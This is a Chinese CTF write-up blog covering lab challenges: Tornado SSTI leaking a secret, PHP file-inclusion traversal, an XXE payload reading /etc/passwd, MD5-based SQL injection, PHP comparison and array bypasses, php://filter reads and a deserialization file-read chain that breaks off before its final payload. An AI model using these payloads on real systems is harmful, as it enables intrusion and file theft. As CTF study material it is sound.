2020-08-07</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E6%AF%94%E8%B5%9B/">比赛</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="护网杯-2018-easy-tornado"><a href="#护网杯-2018-easy-tornado" class="headerlink" title="[护网杯 2018]easy_tornado"></a>[护网杯 2018]easy_tornado</h3><p>打开环境<br><img src="https://img-blog.csdnimg.cn/20200315182631262.png" alt="在这里插入图片描述"><br>三个文件，点进去看看<br><img src="https://img-blog.csdnimg.cn/20200315182711730.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200315182727585.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200315182743203.png" alt="在这里插入图片描述"><br>根据提示可以判断是通过读取<code>/fllllllllllllag</code>目录获取flag，同时这个url构成也可以看出一些东西：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//e465ff83-a405-4b2d-8536-b9afb9db504e.node3.buuoj.cn/file?filename=/flag.txt&amp;filehash=47771613f18dfe723c26c5a27b1fc4c6</span></span><br></pre></td></tr></table></figure>
<p>也就是说服务端用 filename 参数指定要读取的文件，再用 filehash 校验这个请求是否合法；结合另外两个文件里的提示，可以得到 filehash 的计算方式为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">filehash = md5(cookie_secret + md5(filename))    # 然后请求 /file?filename=文件名&amp;filehash=上式结果</span><br></pre></td></tr></table></figure>
<p>所以关键是怎么获取这个 cookie_secret，于是开始尝试<br>先直接访问 /fllllllllllllag，得到如下结果<br><img src="https://img-blog.csdnimg.cn/20200315183550195.png" alt="在这里插入图片描述">页面跳到了<code>error?msg=Error</code>，说明 msg 参数的内容会被渲染进页面，基本可以怀疑存在模板注入（SSTI），于是用一个简单的模板表达式试探<br><img src="https://img-blog.csdnimg.cn/20200315183754373.png" alt="在这里插入图片描述">表达式被求值了，可以确定是 SSTI，于是尝试构造 payload<br>去官网看技术文档吧。。。<a target="_blank" rel="noopener" href="https://www.tornadoweb.org/en/stable/guide/templates.html">TORNADO官网</a><br>重点推荐看一下 Request handlers 这个部分，然后查有关<code>cookie_secret</code>的部分（它存放在 application settings 里，而 Tornado 模板中可以通过 <code>handler.settings</code> 直接访问到整个 settings 字典——把密钥放在模板可达的对象上正是本题的根因），可以去看一下<a target="_blank" rel="noopener" href="https://www.cnblogs.com/liyqiang/p/7140530.html">TianTianLi大佬的博客</a><br><img src="https://img-blog.csdnimg.cn/20200315185207560.png" alt="不会的东西就去学"><br>构造payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//e465ff83-a405-4b2d-8536-b9afb9db504e.node3.buuoj.cn/error?msg=&#123;&#123;handler.settings&#125;&#125;</span></span><br></pre></td></tr></table></figure>
<p>成功获取<code>cookie_secret</code>值<br><img src="https://img-blog.csdnimg.cn/20200315185714302.png" alt="在这里插入图片描述">接下来按 <code>md5(cookie_secret + md5('/fllllllllllllag'))</code> 算出 filehash，再以 <code>/file?filename=/fllllllllllllag&amp;filehash=…</code> 请求即可。（这一步我推荐手算，点名批评py3.x——其实是 Python 3 的 <code>hashlib.md5()</code> 只接受 bytes，字符串要先 <code>.encode()</code>，否则会报 TypeError）<br><img src="https://img-blog.csdnimg.cn/20200315190818772.png" alt="在这里插入图片描述">done</p>
<h3 id="HCTF-2018-WarmUp"><a href="#HCTF-2018-WarmUp" class="headerlink" title="[HCTF 2018]WarmUp"></a>[HCTF 2018]WarmUp</h3><p>打开题目<br><img src="https://img-blog.csdnimg.cn/20200313193558126.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">这不是啥都没有吗…..（ctrl+u）<br><img src="https://img-blog.csdnimg.cn/20200313193657862.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">去看source.php<br><img src="https://img-blog.csdnimg.cn/20200313193738688.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">尝试连接到hint.php<br><img src="https://img-blog.csdnimg.cn/20200313193825879.png" alt="在这里插入图片描述">直接上payload：<br><img src="https://img-blog.csdnimg.cn/20200313193948238.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">OK，我的锅，用一下文件包含漏洞看一下</p>
<p>payload（大致思路：<code>%253f</code> 经过两次 URL 解码后变成 <code>?</code>，白名单校验只看 <code>?</code> 之前的 <code>hint.php</code>，而 include 拿到的是完整路径，于是可以用 <code>../</code> 一路回溯到根目录下的 ffffllllaaaagggg）：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=hint.php%<span class="number">253</span>f/../../../../ffffllllaaaagggg</span><br></pre></td></tr></table></figure>
<p>成功</p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="二维码"><a href="#二维码" class="headerlink" title="二维码"></a>二维码</h3><p>拿到文件解压，得到一个二维码图片<br><img src="https://img-blog.csdnimg.cn/20200313203012479.png" alt="在这里插入图片描述"><br>放到在线二维码识别网站上解码（decode）可以得到</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">secret is here</span><br></pre></td></tr></table></figure>
<p>很明显是图片隐写，先用文本/十六进制编辑器打开看一眼<br><img src="https://img-blog.csdnimg.cn/20200313203151187.png" alt="在这里插入图片描述"><br>使用<code>binwalk -e</code>在kali下分离出隐藏的文件<br><img src="https://img-blog.csdnimg.cn/20200313203247860.png" alt="在这里插入图片描述"><br>根据提示可以知道密码应该是一个四位的数字，先使用kali上的<code>fcrackzip</code>指令爆破一下（<code>-b</code> 暴力破解，<code>-c 1</code> 字符集只用数字，<code>-l 4-4</code> 长度固定 4 位，<code>-p 0000</code> 从 0000 开始）<br>command如下：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fcrackzip <span class="literal">-b</span> <span class="literal">-l</span> <span class="number">4</span><span class="literal">-4</span> <span class="literal">-c</span> <span class="number">1</span> <span class="literal">-p</span> <span class="number">0000</span> /root/桌面/_QR_code.png.extracted/<span class="number">1</span>D7.zip</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200313203437471.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">所有可能的密码都在这里了（fcrackzip 默认只检查加密头里的校验字节，误报率约 1/256，所以一万个候选里会剩下几十个；加上 <code>-u</code> 让它用 unzip 实际解压校验，一般只会剩下真正的密码，下面的脚本就可以省掉），下一步就是写脚本了，毕竟手操不是常规</p>
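<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">import subprocess</span><br><span class="line"></span><br><span class="line"># Candidates printed by fcrackzip (a 4-digit PIN); `fcrackzip -u` would verify them with unzip itself.</span><br><span class="line">password=[&quot;0149&quot;,&quot;0690&quot;,&quot;1106&quot;,&quot;1358&quot;,&quot;1739&quot;,&quot;1786&quot;,&quot;1801&quot;,&quot;2316&quot;,&quot;2389&quot;,&quot;2773&quot;,&quot;2845&quot;,&quot;2988&quot;,&quot;3149&quot;,&quot;3151&quot;,&quot;3717&quot;,&quot;3720&quot;,&quot;3757&quot;,&quot;3854&quot;,&quot;4281&quot;,&quot;4363&quot;,&quot;4560&quot;,&quot;4884&quot;,&quot;4985&quot;,&quot;6207&quot;,&quot;6246&quot;,&quot;6325&quot;,&quot;6326&quot;,&quot;6398&quot;,&quot;6851&quot;,&quot;6962&quot;,&quot;6985&quot;,&quot;7127&quot;,&quot;7639&quot;,&quot;7803&quot;,&quot;8409&quot;,&quot;8430&quot;,&quot;8522&quot;]</span><br><span class="line">zip_path=&quot;/root/桌面/_QR_code.png.extracted/1D7.zip&quot;</span><br><span class="line">print(&quot;bomb!&quot;)</span><br><span class="line">for i in password:</span><br><span class="line">    # argv list form: no shell is involved, so a candidate is never parsed as shell syntax</span><br><span class="line">    r=subprocess.run([&quot;unzip&quot;,&quot;-c&quot;,&quot;-P&quot;,i,zip_path],stdout=subprocess.PIPE,stderr=subprocess.STDOUT,universal_newlines=True)</span><br><span class="line">    if r.returncode==0:  # unzip exits non-zero when the password does not decrypt the entry</span><br><span class="line">        print(&quot;password:&quot;,i)</span><br><span class="line">        print(r.stdout)</span><br><span class="line">        break</span><br><span class="line">else:</span><br><span class="line">    print(&quot;no candidate worked&quot;)</span><br><span class="line">print(&quot;finish!mission complete!&quot;)</span><br></pre></td></tr></table></figure>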
<p>得到结果</p>
<h3 id="金三胖"><a href="#金三胖" class="headerlink" title="金三胖"></a>金三胖</h3><p>害，这就是个废题。。。<br>在这里强烈推荐在电脑上装一个爱奇艺万能播放器，直接提取gif所有帧<br><img src="https://img-blog.csdnimg.cn/20200313203842184.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">结束</p>
<h2 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a>CRYPTO</h2><h3 id="MD5"><a href="#MD5" class="headerlink" title="MD5"></a>MD5</h3><p>MD5 是单向散列，谈不上“反解”：所谓在线解密站其实是用预先算好的字典/彩虹表反查，短口令基本都能查到，找个网站查一下就很香<br><img src="https://img-blog.csdnimg.cn/20200313204529449.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h3 id="看我回旋踢"><a href="#看我回旋踢" class="headerlink" title="看我回旋踢"></a>看我回旋踢</h3><p>花里胡哨的，其实就是凯撒密码<br><img src="https://img-blog.csdnimg.cn/20200313205012768.png" alt="在这里插入图片描述"><br>位移 13（即 ROT13，正向或反向移 13 位结果相同）<br><img src="https://img-blog.csdnimg.cn/20200313205054558.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h3 id="URL编码"><a href="#URL编码" class="headerlink" title="URL编码"></a>URL编码</h3><p>如题</p>
<h3 id="一眼就解密"><a href="#一眼就解密" class="headerlink" title="一眼就解密"></a>一眼就解密</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ZmxhZ3tUSEVfRkxBR19PRl9USElTX1NUUklOR30=</span><br></pre></td></tr></table></figure>
<p>base64解就完事</p>
<h3 id="摩丝密码"><a href="#摩丝密码" class="headerlink" title="摩丝密码"></a>摩丝密码</h3><p>摩尔斯电码，字母之间已经用空格分隔好了，对照码表翻译即可</p>
<h2 id="REAL"><a href="#REAL" class="headerlink" title="REAL"></a>REAL</h2><h2 id="PHP-XXE"><a href="#PHP-XXE" class="headerlink" title="[PHP]XXE"></a>[PHP]XXE</h2><p>这绝对是今天最有意思的一道题了，因为不需要查资料了<br>打开页面：<br><img src="https://img-blog.csdnimg.cn/20200313210724883.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="开幕雷击">开局phpinfo是真的顶，翻了一遍没看出来有什么用处，但是联系题目名称的XXE，猜测可能是XXE的漏洞，构造PAYLOAD:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span>xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;utf-8&quot;</span><span class="meta">?&gt;</span></span><br><span class="line">&lt;!DOCTYPE xxe &#123;</span><br><span class="line">         &lt;!ELEMENT name ANY&gt;</span><br><span class="line">         &lt;!ENTITY xxe SYSTEM <span class="string">&quot;file=///etc/passwd&quot;</span>&gt;</span><br><span class="line">&gt;</span><br><span class="line">&lt;root&gt;</span><br><span class="line">        &lt;name&gt;&amp;xxe;&lt;/name&gt;</span><br><span class="line">&lt;/root&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200313211007809.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>出结果就是雷击，但是别慌，再找找<br><img src="https://img-blog.csdnimg.cn/2020031321104057.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">似曾相识，往下看<br><img src="https://img-blog.csdnimg.cn/20200313211107285.png" alt="在这里插入图片描述">果然</p>
<h1 id="2020-09-21"><a href="#2020-09-21" class="headerlink" title="2020.09.21"></a>2020.09.21</h1><h2 id="WEB-1"><a href="#WEB-1" class="headerlink" title="WEB"></a>WEB</h2><h3 id="BJDCTF2020-Easy-MD5"><a href="#BJDCTF2020-Easy-MD5" class="headerlink" title="[BJDCTF2020]Easy MD5"></a>[BJDCTF2020]Easy MD5</h3><p>打开页面，只有一个输入框<br><img src="https://img-blog.csdnimg.cn/20200921231831338.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>继续走，看Network：<br><img src="https://img-blog.csdnimg.cn/20200921231911103.png#pic_center" alt="在这里插入图片描述"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hint: select * from &#39;admin&#39; where password&#x3D;md5($pass,true)</span><br></pre></td></tr></table></figure>
<p><code>md5($pass,true)</code> 返回的是 16 字节的原始二进制而不是 hex 串，并且被直接拼进了 SQL。字符串 <code>ffifdyop</code> 的 MD5 原始输出以 <code>'or'6</code> 开头，拼接后查询变成 <code>… where password=''or'6…'</code>，MySQL 把以数字开头的字符串转成非 0 数值，条件恒真，效果等同于万能密码 <code>' or 1=1</code>，所以直接输入 <code>ffifdyop</code> 即可</p>
<p>下一关：<br><img src="https://img-blog.csdnimg.cn/20200921232209172.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>查看网页源码<br><img src="https://img-blog.csdnimg.cn/2020092123224937.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>这不冲？源码里用的是松散比较（==），只要找两个 MD5 以 <code>0e</code> 加纯数字开头的字符串即可：PHP 会把这样的 hash 当成科学计数法解析成 0，0 == 0 成立（换成 === 这招就不灵了）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload: url&#x2F;?a&#x3D;s878926199a&amp;b&#x3D;s155964671a</span><br></pre></td></tr></table></figure>
<p>下一关<br><img src="https://img-blog.csdnimg.cn/20200921232437127.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>从源码看这一关换成了强比较（===），0e 技巧失效，改为把两个参数都以数组形式传入（形如 <code>xxx[]=1&amp;yyy[]=2</code>）。此处直接摘要<strong>颖奇L’Amore</strong>师傅的笔记（补充一点：PHP 5/7 下 md5() 收到数组时实际返回的是 NULL 并给出 warning，NULL === NULL 同样成立；PHP 8 则会直接抛 TypeError，此法失效）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">典型的md5 bypass，</span><br><span class="line">因为md5()或者sha1()之类的函数计算的是一个字符串的哈希值，</span><br><span class="line">对于数组则返回false，</span><br><span class="line">如果$a和$b都是数组则双双返回FALSE, 两个FALSE相等得以绕过。</span><br></pre></td></tr></table></figure>
<p>DONE</p>
<h1 id="2020-09-22"><a href="#2020-09-22" class="headerlink" title="2020.09.22"></a>2020.09.22</h1><h2 id="WEB-2"><a href="#WEB-2" class="headerlink" title="WEB"></a>WEB</h2><h3 id="极客大挑战-2019-BuyFlag"><a href="#极客大挑战-2019-BuyFlag" class="headerlink" title="[极客大挑战 2019]BuyFlag"></a>[极客大挑战 2019]BuyFlag</h3><p>打开环境</p>
<p><img src="https://img-blog.csdnimg.cn/20200923003932271.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="题目环境"><br>提示一个是用户来源问题，另外一个是需要正确的密码，查看network和网页源码</p>
<p><img src="https://img-blog.csdnimg.cn/20200923004200841.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><img src="https://img-blog.csdnimg.cn/20200923004216694.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">猜测需要将user参数改为真，并且POST传递一个password参数</p>
<p><img src="https://img-blog.csdnimg.cn/2020092300434589.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20200923004420306.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>密码错误。推测服务端先拒绝纯数字的密码（is_numeric 一类的检查），再用松散比较（==）和 404 比对，于是改成<code>password=404%00</code>：尾部的空字节让字符串不再是“纯数字”，而 PHP 7 的松散比较只看前导数字部分，仍然等于 404（PHP 8 已改变这一行为，非数字字符串会按字符串比较，此法不再适用）<br><img src="https://img-blog.csdnimg.cn/20200923004539386.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>还是需要买？那可不行，白嫖怪什么时候真买过东西<br>判断是传递参数 money，多次测试发现与数组绕过 strcmp 有关：strcmp() 收到数组时返回 NULL（并给出 warning），而 <code>NULL == 0</code> 成立（PHP 8 下会抛 TypeError），于是在 password 参数后附一个<code>money[]=a</code></p>
<p>DONE</p>
<h3 id="ZJCTF-2019-NiZhuanSiWei"><a href="#ZJCTF-2019-NiZhuanSiWei" class="headerlink" title="[ZJCTF 2019]NiZhuanSiWei"></a>[ZJCTF 2019]NiZhuanSiWei</h3><p><strong>本题考点：</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php://filter   #以 base64 形式读取源码，避免被 include 直接执行</span><br><span class="line">data://        #构造内容可控的“文件”，通过 file_get_contents 的内容校验（本题没有用到 php://input）</span><br><span class="line">unserialize()  #反序列化 + echo 触发 __tostring，实现任意文件读取</span><br></pre></td></tr></table></figure>
<p>打开环境即可获得源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="variable">$text</span> = <span class="variable">$_GET</span>[<span class="string">&quot;text&quot;</span>];</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];</span><br><span class="line"><span class="variable">$password</span> = <span class="variable">$_GET</span>[<span class="string">&quot;password&quot;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;welcome to the zjctf&quot;</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>).<span class="string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/flag/&quot;</span>,<span 
class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Not now!&quot;</span>;</span><br><span class="line">        <span class="keyword">exit</span>(); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$file</span>);  <span class="comment">//useless.php</span></span><br><span class="line">        <span class="variable">$password</span> = unserialize(<span class="variable">$password</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$password</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>分析可知存在三个需要绕过的点</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;welcome to the zjctf&quot;</span>))</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&quot;/flag/&quot;</span>,<span class="variable">$file</span>))&#123; </span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$password</span> = unserialize(<span class="variable">$password</span>); </span><br></pre></td></tr></table></figure>
<p>按照顺序一个一个来<br>首先是第一个：text 会被当作文件路径交给 file_get_contents 读取，且读出的内容必须恰好是 <code>welcome to the zjctf</code>，于是用 data:// 伪协议直接把内容喂给它（依赖 allow_url_fopen 开启；更常见的写法是 <code>data://text/plain;base64,…</code>），payload 为：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">text=data://filter/text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=</span><br></pre></td></tr></table></figure>
<p>第二个检查只是对 file 参数做 <code>/flag/</code> 的正则过滤，file 里不出现 flag 即可通过，真正读 flag 要靠后面的反序列化。源码注释里提示的 <code>useless.php</code> 十分扎眼，直接访问没有东西（它只定义了一个类，没有任何输出），于是祭出老办法，通过 php://filter 把源码按 base64 编码读出来（直接 include 会把它当 PHP 执行，看不到源码）：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file=php://filter/read=convert.base64-encode/resource=useless.php</span><br></pre></td></tr></table></figure>
<p>得到源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo&#x3D;</span><br></pre></td></tr></table></figure>
<p>进行解密可得</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Flag</span></span>&#123;  <span class="comment">//flag.php  </span></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;  </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__tostring</span>(<span class="params"></span>)</span>&#123;  </span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;file))&#123;  </span><br><span class="line">            <span class="keyword">echo</span> file_get_contents(<span class="keyword">$this</span>-&gt;file); </span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> (<span class="string">&quot;U R SO CLOSE !///COME ON PLZ&quot;</span>);</span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="meta">?&gt;</span>  </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>根据 <code>useless.php</code> 的源码构造反序列化 payload。可以看到 <code>Flag</code> 类的 <code>__toString()</code> 在 <code>$this-&gt;file</code> 已设置时会把它交给 <code>file_get_contents()</code> 并直接 <code>echo</code> 出来，因此这是一个可控的任意文件读取点：只要把 <code>file</code> 属性设为 <code>flag.php</code>，对象被当作字符串使用（例如被 <code>echo</code>）时就会输出该文件的内容。另外注意下面 payload 里写的类名是 <code>O:4:&quot;FLAG&quot;</code>，而源码里是 <code>class Flag</code>、方法名是 <code>__tostring</code>——PHP 的类名和魔术方法名都不区分大小写，所以这样写依然能命中同一个类：</p>
